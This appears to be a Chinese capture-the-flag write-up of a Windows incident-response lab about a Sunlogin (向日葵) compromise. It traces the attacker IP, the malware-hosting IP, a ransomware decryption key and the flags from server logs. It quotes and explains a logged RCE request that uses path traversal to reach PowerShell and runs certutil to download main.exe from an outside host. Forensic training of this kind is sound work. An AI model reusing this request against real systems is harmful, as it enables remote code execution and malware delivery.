当前位置: 首页 > news >正文

第四章 windows实战-向日葵

第四章 windows实战-向日葵

1、通过本地 PC RDP到服务器并且找到黑客首次攻击成功的时间为 为多少,将黑客首次攻击成功的时间为 作为 FLAG 提交(2028-03-26 08:11:25.123);

翻阅日志的时候发现了在3月21日的时候黑客就已经开始发起进攻了但是一直没有成功

image-20251020165444537

直到在3月26日的时候黑客执行了ping命令和whoami的操作,这些操作是黑客首次上线会执行的操作之一确定自己是什么用户权限等

image-20251020170019750

flag{2024-03-26 10:16:25.585}

2、通过本地 PC RDP到服务器并且找到黑客攻击的 IP 为多少,将黑客攻击 IP 作为 FLAG 提交;

从上一题可以知道黑客连接的ip为

flag{192.168.31.45}

3、通过本地 PC RDP到服务器并且找到黑客托管恶意程序 IP 为,将黑客托管恶意程序 IP 作为 FLAG 提交;

继续翻阅日志在下面发现了一个exe执行程序

image-20251020170240608

[Acceptor][HTTP] new RC HTTP connection 192.168.31.45:49329, 
path: /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+certutil+-urlcache+-split+-f+http%3A%2F%2F192.168.31.249%2Fmain.exe, 
version: HTTP/1.1

二、逐部分解析

关键字段 说明
192.168.31.45:49329 攻击者的来源IP和端口(客户端发起连接)
/check?cmd=... 访问的路径;?cmd= 表明目标Web服务可能有命令执行功能(例如一个远程控制或监控接口)
%2F URL编码的/,表示攻击者在尝试目录穿越(Path Traversal)../../../../ 让命令越过应用目录,进入系统路径。
windows/system32/WindowsPowerShell/v1.0/powershell.exe 攻击者调用系统的 PowerShell。说明服务程序已经执行了外部命令(RCE成立)。
certutil -urlcache -split -f http://192.168.31.249/main.exe 这是 下载恶意文件的命令:使用 Windows 内置的 certutil 工具下载远程木马 main.exe。这也是一个典型的“利用系统自带工具绕过防护”的方式。
192.168.31.249 被控机器要去下载的木马服务器(黑客控制端 IP)
plugin:check, session:sobGzXzWBfSlSbdqnmkUbJMLEjhssRx1 说明服务端接受了请求并分配了一个会话ID(session)。这意味着命令被正常解析执行。
flag{192.168.31.249}

4、找到黑客解密 DEC 文件,将黑客DEC 文件的 md5 作为 FLAG 提交;

继续翻阅日志在下面发现了一个qq号

image-20251020171256162

QQ搜索一下发现了一个群聊

image-20251020171343067

image-20251020171431231

image-20251020171611262

拿到密码题目要求我们进行md5加密

image-20251020171704546

flag{5ad8d202f80202f6d31e077fc9b0fc6b}

5、通过本地 PC RDP到服务器并且解密黑客勒索软件,将桌面加密文件中关键信息作为 FLAG 提交;

打开桌面上的 baoleiji.txt文件

image-20251020174020465

image-20251020174043752

和.DEC文件复制到一个txt里面

image-20251020174110900

拿去网站进行 rsa解密 https://try8.cn/tool/cipher/rsa

NXVJSTQUAPGTXKSX

image-20251020174605360

再拿去RSA解密

解密得到flag,iv偏移量是16个0;

image-20251020174645463

@suanve
时间是连续的,年份只是人类虚构出来用于统计的单位,2024年第一天和2023年最后一天,
不会有任何本质区别。你的花呗,你的客户,你的体检报告,窗外的寒风,都不会因为这是新的一年,
而停下对你的毒打。
GIVE YOU FLAG!!!!!
flag{EDISEC_15c2e33e-b93f-452c-9523-bbb9e2090cd1}

也是很励志了

http://www.hskmm.com/?act=detail&tid=36669

相关文章:

  • 第四章 windows实战-emlog
  • 第四章 windows实战-wordpress
  • Docling + LangChain + RAG 构建智能文档问答系统
  • 广义串并联图
  • 2025 种植棚/养殖棚/工程/羊肚菌/保温/园林/加厚/绿化/草苫子推荐榜:济宁泽萌草制品 5 星领跑,适配大棚 / 混凝土 / 园艺多场景需求
  • 2025年口碑好的防锈漆厂家最新推荐排行榜
  • 2025 餐饮/电商/品牌策划优选榜:上海物心 5 星领跑,细分领域这些适配型企业值得 pick
  • 2025 灌装/大桶/桶装/纯净/瓶装/水设备精选推荐榜:路得自动化领衔,这些靠谱品牌值得关注
  • 2025 打捆机捆/包装/绕树干/草绳推荐榜:济宁泽萌草制品 5 星领跑,适配农业 / 园艺 / 建筑 / 物流捆扎需求
  • 遇到一例无法保存编辑后的 Excel 文件的问题
  • 告别难找的本地搜图工具!ImageSearch 2.2 携全新 2.0UI 登场
  • 2025 年焊管源头厂家最新推荐榜单:盘点高性能焊管制造企业,助力下游企业精准选品家具/汽车/高精度内刮/镀铝/不锈钢/高强钢焊管厂家推荐
  • 2025 年钢管厂家最新推荐榜:覆盖精密钢管、汽车钢管、高强钢钢管等品类,为下游采购企业提供权威选品参考
  • ubuntu24.04 server 版本安装xfce 使用web novnc 远程桌面
  • 数据结构做题记录
  • 生成函数入门
  • 2025 年 PPT 生成工具品牌最新推荐榜单:AI 备案技术加持 + 千万用户信赖,优质工具全方位测评ppt一键生成/自动生成ppt/ppt制作ai工具推荐
  • 2025 国内西服定制品牌口碑榜:私人/西服/婚礼/高级/高端/高档/男士/女士/轻奢/企业团体职业/企业高管/商务/手工/休闲西服定制厂家推荐
  • 题解:P14023 [ICPC 2024 Nanjing R] 社交媒体
  • 2025 全合成润滑油厂家企业推荐榜:进口润滑油/国产润滑油/国内润滑油/半合成润滑油厂家,技术与服务双驱发展
  • docker安装iotdb
  • ALV 按钮置灰
  • 微算法科技(NASDAQ MLGO)创建企业级区块链双层共识算法:融合优化DPoS与动态BFT的协同机制设计
  • CKS-CN 考试知识点分享(14) Istio网络策略 - 实践
  • 2025年10月叛逆青少年改造机构全景解析报告,基于专业测评的技术、性能及市场优势深度分析
  • 2025年10月微高压氧舱厂家全景解析报告,基于专业测评的技术、性能及市场优势深度分析
  • Kubernetes应用微服务 - 指南
  • 看板(Kanban)的使用
  • 第一个 AI 应用
  • 软件工程课程第二次团队作业